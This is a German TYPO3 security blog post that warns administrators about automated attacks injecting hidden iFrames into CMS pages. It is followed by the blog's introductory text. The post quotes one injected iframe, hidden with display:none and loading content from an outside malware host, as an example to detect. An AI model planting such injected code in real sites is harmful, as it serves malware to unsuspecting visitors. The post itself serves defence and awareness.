[A translated version of this article is available on the official TYPO3 Blog page]

Schon seit einiger Zeit wird von wiederkehrenden Angriffen auf Webserver berichtet, so etwa in den Pressemeldungen “Groß angelegter Angriff auf Web-Anwender im Gange”, “Weitere Details zu Web-Attack-Toolkit MPack” “Schneeball-Effekt: nur ein anfälliges PHP-Script genügt” und vielen anderen Quellen. In diesen Angriffen werden - zumindest teilweise automatisiert - verschiedene Wege ausgenutzt, um Kontrolle über die Webserver zu erlangen.

Dies hat nun auch TYPO3 (und andere CMS-Systeme) erreicht: Einige Berichte zu solchen Vorkommnissen waren in Foren zu lesen, andere wurden diskret dem TYPO3 Security Team gemeldet. In diesem Artikel möchte ich vorstellen, was davon von allgemeinem Interesse ist.

“Woran kann ich erkennen, ob mein System betroffen ist?”

Das “Hacken” der Systeme wird momentan offenbar vor allem ausgenutzt, um kleine HTML “Inline-Frames” (iFrames) im Seiteninhalt zu verankern. Wenn ich also als ahnungsloser Endbenutzer eine betroffenen Webseite besuche, sieht diese möglicherweise ganz normal aus - allerdings wird unbemerkt zusätzlicher Inhalt von einem fremden Server geladen. Dies kann Schadsoftware aller Art sein (die ihrerseits z.B. neue Javascript- oder Windows-Lücken ausnutzt.)

Die gehackten Systeme werden also als zentral gesteuerte “Malware-Schleuder” verwendet. (ABER: Dies kann sich schon morgen ändern! Wenn die Hacker sich überlegen, die betroffenen Server anderweitig zu mißbrauchen oder gar zu zerstören, werden sie das tun können.) Links zu weiteren Analysen finden sich z.B. im o.g. Heise-Artikel.

Bleiben wir bei den iFrame-Attacken. Wie sehen diese nun konkret aus? Das Prinzip ist klar: Im Seitenquelltext findet sich die Einbindung eines iFrame, z.B. in der einfachsten Schreibweise:
<iframe src=http://www.alexa-rank.info/libraries/iframe.php
?u=a4" style="display:none"></iframe>

Doch die Hacker (oder sogar nur “der Hacker”?) haben inzwischen viele andere Varianten hinterlassen, die verschleiern sollen, was vor sich geht. (more…)

Hallo und Willkommen auf der TYPO3 Security Blog Seite für alle interessierten Administratoren, Entwickler und Anwender!

Hier gibt’s Informationen zu Sicherheitsfragen rund um TYPO3 - Allgemeine Tipps ebenso wie Hintergründe zu konkreten Problemen, oder auch Diskussion von inhaltliche Neuerungen und Verbesserungen von TYPO3 und Extensions.

Überhaupt, Extensions: Die meisten TYPO3-Sites bestehen heute überwiegend aus “Dritt-Extensions”, die nicht Bestandteil des Kernprodukts sind. Von daher drehen sich viele Sicherheitsfragen eher um Erweiterungen als um den Kern. Diese sollen hier natürlich mitbetrachtet werden, ich versuche allerdings immer, die Einordnung klarzustellen…

Dieser Blog ist keine offizielle Veröffentlichung des TYPO3 Projekts oder des TYPO3 Security Teams.

Ekkehard Gümbel